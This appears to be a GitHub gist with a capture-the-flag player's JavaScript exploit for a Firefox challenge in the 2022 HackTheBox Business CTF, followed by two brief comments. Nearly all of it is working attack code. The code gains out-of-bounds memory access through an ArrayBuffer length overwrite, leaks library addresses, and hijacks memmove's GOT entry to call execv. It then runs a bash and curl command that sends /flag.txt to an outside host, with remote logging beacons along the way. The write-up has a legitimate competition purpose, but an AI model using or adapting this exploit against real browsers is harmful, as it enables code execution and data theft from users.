Skip to content

Instantly share code, notes, and snippets.

@d0now

d0now/2022-HTB-BUSINESS-CTF-Midenios.md

Last active August 23, 2022 06:18
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save d0now/c0280a7246fd97edb71468d87d0b8e83 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save d0now/c0280a7246fd97edb71468d87d0b8e83 to your computer and use it in GitHub Desktop.
Download ZIP
2022 HackTheBox Business CTF Midenios
Raw
2022-HTB-BUSINESS-CTF-Midenios.md
  • My first time firefox js exploit
  • Not a intended way, but I was fast (first blood)
Raw
exploit.js
function hexdump(b, s) {
i = 0;
r = "";
while (i < s) {
if ((i + 1) % 0x10) {
r += b[i].toString(16).padStart(2, '0') + ' ';
} else {
r += b[i].toString(16).padStart(2, '0') + '\n';
}
i += 1;
}
return r;
}
function hexdump64(b, o, s) {
i = o;
c = 0;
r = "";
while (i < s + o) {
r += b[i + 7].toString(16).padStart(2, '0')
r += b[i + 6].toString(16).padStart(2, '0')
r += b[i + 5].toString(16).padStart(2, '0')
r += b[i + 4].toString(16).padStart(2, '0')
r += b[i + 3].toString(16).padStart(2, '0')
r += b[i + 2].toString(16).padStart(2, '0')
r += b[i + 1].toString(16).padStart(2, '0')
r += b[i + 0].toString(16).padStart(2, '0')
if (c != 1) {
r += ' ';
c += 1;
} else {
r += '\n';
c = 0;
}
i += 8;
}
return r;
}
function relRead32(a, o) {
r = 0;
r |= a[o + 0] << 0;
r |= a[o + 1] << 8;
r |= a[o + 2] << 16;
r |= a[o + 3] << 24;
return r >>>= 0;
}
function relRead64(a, o) {
r_lo = relRead32(a, o + 0);
r_hi = relRead32(a, o + 4);
return {'hi': r_hi, 'lo': r_lo, 'int': BigInt(r_hi) << 32n | BigInt(r_lo)};
}
function relWrite32(a, o, v) {
r = 0;
a[o + 0] = (v & 0x000000ff) >> 0;
a[o + 1] = (v & 0x0000ff00) >> 8;
a[o + 2] = (v & 0x00ff0000) >> 16;
a[o + 3] = (v & 0xff000000) >> 24;
}
function relWrite64(a, o, v_hi, v_lo) {
relWrite32(a, o + 0, v_lo);
relWrite32(a, o + 4, v_hi);
}
function setup_arrays() {
vulnArrBuf = new ArrayBuffer(8);
vulnArrBuf.byteLength = 0xffffffff;
vulnByteArr = new Uint8Array(vulnArrBuf);
vulnByteArr[0] = 0xbe
vulnByteArr[1] = 0xba
vulnByteArr[2] = 0xfe
vulnByteArr[3] = 0xca
targetByteArr = new Uint8Array(8);
relWrite64(targetByteArr, 0, 0x13371337, 0x0f000f00);
var i = 0;
found = 0;
while (i < 0x10000) {
l = relRead64(vulnByteArr, i)
if (l.lo == 0x0f000f00) {
// console.log("found 0x" + i.toString(16))
relWrite64(targetByteArr, 0, 0x13371337, 0x13371337)
l = relRead64(vulnByteArr, i)
if (l.lo != 0x13371337) {
relWrite64(targetByteArr, 0, 0x13371337, 0x0f000f00)
} else {
found = i
}
}
i += 8;
}
if (!found) {
// console.log("not found.");
return -1;
} else {
return { vuln: vulnByteArr, target: targetByteArr, offset: found }
}
}
function logremote(log) {
if (logremoteon) {
var xhr = new XMLHttpRequest();
xhr.open('GET', remote+'/hey.txt?'+log, false);
xhr.send(null);
}
}
function exploit() {
console.log("exploit start.");
var i = 0;
while (i < 0x100) {
ret = setup_arrays();
if (ret != -1) {
break
}
i += 1;
}
if (i >= 0x100) {
console.log("not found.");
logremote("not found.")
return -1;
}
vulnByteArr = ret.vuln
targetByteArr = ret.target
v2tOff = ret.offset
console.log(hexdump64(vulnByteArr, v2tOff-0x40, 0x100))
// leak base
leak = relRead64(vulnByteArr, v2tOff-0x28)
console.log(leak.int.toString(16))
xul_base = {'hi': leak.hi, 'lo': leak.lo - 0x3110208}
xul_memmove_got = {'hi': xul_base.hi, 'lo': xul_base.lo + 0x0ce5b880}
xul_execv_got = {'hi': xul_base.hi, 'lo': xul_base.lo + 0x0ce600c8}
// leak execv@libc
targetByteArrOrig = relRead64(vulnByteArr, v2tOff-8)
relWrite64(vulnByteArr, v2tOff-8, xul_execv_got.hi, xul_execv_got.lo)
libc_execv = relRead64(targetByteArr, 0)
console.log("execv@libc: " + libc_execv.int.toString(16))
logremote("hey")
// make payload
// l = relRead64(vulnByteArr, v2tOff-8)
vulnByteArrStart = {'hi': targetByteArrOrig.hi, 'lo': targetByteArrOrig.lo - v2tOff}
argv = ["/bin/bash", "-c", "/usr/bin/curl \"http://d0now.cloud:31337/flag=$(/bin/cat /flag.txt)\""]
argv_addr = []
idx = 0
for (var i = 0; i < argv.length; i++) {
argv_addr.push(vulnByteArrStart.lo + idx)
for (var j = 0; j < argv[i].length; j++) {
vulnByteArr[idx + j] = argv[i].charCodeAt(j);
}
vulnByteArr[idx + argv[i].length] = 0;
idx += argv[i].length + 1
}
cmdarr = new Uint8Array(100);
cmd = "/bin/bash";
for (var i = 0; i < cmd.length; i++) {
cmdarr[i] = cmd.charCodeAt(i);
}
cmdarr[cmd.length] = 0;
logremote("wow")
relWrite64(cmdarr, 0x10, vulnByteArrStart.hi, argv_addr[0])
relWrite64(cmdarr, 0x18, vulnByteArrStart.hi, argv_addr[1])
relWrite64(cmdarr, 0x20, vulnByteArrStart.hi, argv_addr[2])
relWrite64(cmdarr, 0x28, 0, 0)
// trigger
console.log("trigger...")
logremote("trigger")
targetByteArr_orig = relRead64(vulnByteArr, v2tOff-8)
relWrite64(vulnByteArr, v2tOff-8, xul_memmove_got.hi, xul_memmove_got.lo)
memmove_orig = relRead64(targetByteArr, 0)
relWrite64(targetByteArr, 0, libc_execv.hi, libc_execv.lo - 6)
cmdarr.copyWithin(0, 0x10);
// recover
relWrite64(targetByteArr, 0, memmove_orig.hi, memmove_orig.lo)
relWrite64(vulnByteArr, v2tOff-8, targetByteArrOrig.hi, targetByteArrOrig.lo)
// log
console.log("done")
logremote("done")
}
function exploit_debug_1() {
logremoteon=true
remote="http://127.0.0.1:1337"
exploit()
}
function exploit_real() {
logremoteon=false
exploit()
}
@neomafo88
Copy link
Copy Markdown

neomafo88 commented Jul 19, 2022

typographical error on https://gist.github.com/d0now/c0280a7246fd97edb71468d87d0b8e83#file-midenios_exploit-js-L208

function_exploit_real() function exploit_real()

@d0now
Copy link
Copy Markdown
Author

d0now commented Aug 23, 2022

typographical error on https://gist.github.com/d0now/c0280a7246fd97edb71468d87d0b8e83#file-midenios_exploit-js-L208

function_exploit_real() function exploit_real()

@neomafo88 Thank you!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment